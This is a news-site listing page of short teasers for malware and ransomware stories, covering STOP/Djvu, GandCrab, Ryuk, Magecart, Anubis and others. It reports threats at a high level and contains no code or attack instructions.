Malware | SC Media

Malware

Downloads of cracked software distribute ransomware via adware bundles

By

Websites offering cracked versions of popular software programs have recently been serving up adware bundles that secretly deliver a variant of STOP ransomware. According to a pair of reports from Bleeping Computer founder Lawrence Abrams, the scheme came to light in December 2018 with the appearance of the malicious encryptor “Djvu” – so named because…

Abuse.ch takes down 100K malware distribution sites in 10 months

By

Swiss non-profit threat sharing, Abuse.ch, announced its platform has managed to takedown 100,000 malware distribution sites in 10 months in a recent project which consisted of sharing malicious URL used for distribution. Abuse.ch’s URLhaus project was launched last year to collect malicious URLs by allowing anyone to sign up with a Twitter account to report…

telegrammessageapp_875461

Researchers find Telegram bot chatter is actually Windows malware commands

By

Decrypted Telegram bot chatter was found to actually be a new Windows malware, dubbed GoodSender, which uses the messenger platform to listen and wait for commands. Forcepoint researchers discovered what it described as a “fairly simple” year old malware that creates a new administrator account that enables remote desktop once it infects a victim’s device.…

Google Play boots fake apps that spy on devices’ motion sensor data before dropping Anubis malware

By

A fake currency converter and a phony battery utility program are among the latest fraudulent apps to be expunged from Google Play, according to researchers who discovered they were infecting users with a version of the Anubis banking malware family. Both fraudulent apps employ a crafty technique to determine whether it is safe for them…

GandCrab returns with trojans and redundency

By

The GandCrab ransomware has returned with a new set of trojans in addition to its initial infection. The addition of new tools comes just over a week after at least one threat actor began using a combination the info stealer Vidar with the ransomware to increase their odds of taking something of value away from…

New Magecart group using new tactics hits French ad firm

By

Researchers at Trend Micro and RiskIQ have pulled the curtain away from a new Magecart sub-group that managed to insert card skimmer code into more than 200 companies by using a third-party vendor as an unwitting accomplice. The new malicious team, tagged Magecart Group 12, managed to inject their malware into the JavaScript library of…

Rocke malware disables cloud security before mining cryptocurrency

By

A new Linux cryptocurrency mining malware used by the Rocke group can evade detection from cloud security protocols by disabling them. Palo Alto’s Unit 42 researchers spotted what appears to be the first malware family that can target and remove cloud security products, according to a blog post. “Public cloud infrastructure is one of the…

Del Rio, Texas ransomware attack knocks city offline

By

Another city was hit with a ransomware attack which knocked daily services back into the era of the pen and Pad. Last week, the city of Del Rio, Texas was hit with a ransomware attack which forced city officials to shut down the servers at its city hall and deny employees access to the system,…

torrent

Fake Movie injects malicious content into high profile sites

By

A malicious Windows shortcut file disguised as a movie on The Pirate Bay torrent tracker is capable of injecting malicious content from the attacker into high-profile websites as well as for stealing cryptocurrency. A security researcher who goes by the twitter handle 0xffff0800 discovered the malware masquerading as a video file for the movie  “The…

Ryuk ransomware linked to Emotet and TrickBot trojans; suspicions shift to cybercriminal group

By

Multiple researchers are linking the Ryuk ransomware that disrupted the operations of multiple U.S. newspapers in late 2018 to the Emotet and TrickBot trojans. In so doing, some analysts have now also shifted blame for the attack from North Korean actors to cybercriminals, possibly from Russia, while others maintain that attribution efforts are premature. Crowdstrike,…

Next post in Security News